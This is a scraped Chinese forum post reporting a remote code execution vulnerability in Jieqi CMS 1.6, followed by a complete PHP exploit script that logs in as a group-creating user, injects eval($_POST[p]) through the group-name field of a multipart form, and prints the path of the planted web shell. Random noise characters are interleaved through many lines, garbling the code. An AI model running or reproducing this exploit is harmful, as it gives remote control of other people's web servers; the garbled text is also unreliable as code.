杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。
$ z$ z/ d! R% n* O2 h% i# l+ t5 X f* c
& C% Y( [+ O/ J
该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞,应该有2年多历史了。
( W( b6 {6 l6 v) [ 需要有一个能创建圈子的用户。# ? Q% A8 |' D+ O8 w6 h2 F8 w
1 l8 W4 Z! K. p) Z7 {& K( a<?php# @* O1 f7 v+ n% a
8 Q# C! d5 U8 f" R
print_r('
6 q3 J5 q6 }8 S+---------------------------------------------------------------------------+
7 }2 B8 s$ O% r' I0 ?2 z) M9 ~Jieqi CMS V1.6 PHP Code Injection Exploit1 l5 [1 m2 n& V2 U+ t: V1 p! }. @6 ]
by flyh4t6 a0 B4 {$ D$ j3 X& m3 }% k
mail: phpsec at hotmail dot com* T3 g' Z+ x, p0 G* y0 {( s
team: http://www.wolvez.org0 R [$ P, B9 t0 z; V2 |6 t+ _
+---------------------------------------------------------------------------+$ i! G0 }( D4 R8 w; U. N
'); /**7 \ z$ { t+ I, ^
* works regardless of php.ini settings; R! ?% L& O! N8 C7 t3 F
*/ if ($argc < 5) { print_r('
+ B/ j0 z1 m# H! P( s+---------------------------------------------------------------------------+
2 q1 `: q/ S! \* AUsage: php '.$argv[0].' host path username1 x/ K" u1 N- e7 m2 s
host: target server (ip/hostname)8 f3 ?( E+ b" W; X! {. o# P5 f
path: path to jieqicms $ y3 C$ K" Y# M
uasename: a username who can create group) o1 \$ F5 S6 W! x8 |5 ^* i/ H! M
Example:
* {* s2 q) j8 {1 }" zphp '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password# W) Z6 G$ H3 y2 R- X
+---------------------------------------------------------------------------+
+ C; X" m b% F6 y5 I7 K'); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $username = $argv[3]; $password = $argv[4]; /*get cookie*/ $cookie_jar_index = 'cookie.txt'; $url1 = "http://$host/$path/login.php"; $params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1"; $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index); curl_setopt($curl1, CURLOPT_POST, 1); curl_setopt($curl1, CURLOPT_POSTFIELDS, $params); ob_start(); $data1 = curl_exec($curl1); if ($data1 === FALSE) { echo "cURL Error: " . curl_error($ch); exit('exploit failed'); } curl_close($curl1); ob_clean(); /*get shell*/ $params ='-----------------------------23281168279961
4 N9 v, v3 Z, n' G; t. R- |Content-Disposition: form-data; name="gname"5 |% z8 z% ?$ z% D
- y0 V( d; ~7 W" U8 T% ^& R) H
'; $params .="';"; $params .='eval($_POST[p]);//flyh4t' v! C3 c, G n: a$ x9 M
-----------------------------23281168279961% h( A$ N2 x, W Z2 ?8 a9 y
Content-Disposition: form-data; name="gcatid"
8 i5 K" r' Q# h- a' ]( u& F
2 z/ l8 A- J' n; m5 {2 Y9 C5 B5 e1
, y3 J" i' Q, a, E. p-----------------------------23281168279961
9 H) Y' W1 }# J3 B M( n [Content-Disposition: form-data; name="gaudit"9 q, ]9 v J) c
: L+ \* `7 F) T# n: Y: c1, B( b3 j; m j# D* N: k
-----------------------------23281168279961
$ Z8 z) J1 @5 _1 uContent-Disposition: form-data; name="gbrief"
9 P5 g$ O; V! J3 G5 Q- J
+ {7 Y- N e( f/ M17 \3 g" g, n+ I* a* O7 ?2 G) U
-----------------------------23281168279961--# y4 ^/ y( p* `. {8 g( A- X& o
'; $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); //$rs就是返回的内容 ob_clean(); www.2cto.com
# T$ E2 }; p' G5 k5 l( z# G* A" ~% E
; X+ m0 o! D, \3 @1 u( k+ s) bpreg_match('/g=([0-9]{1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url; |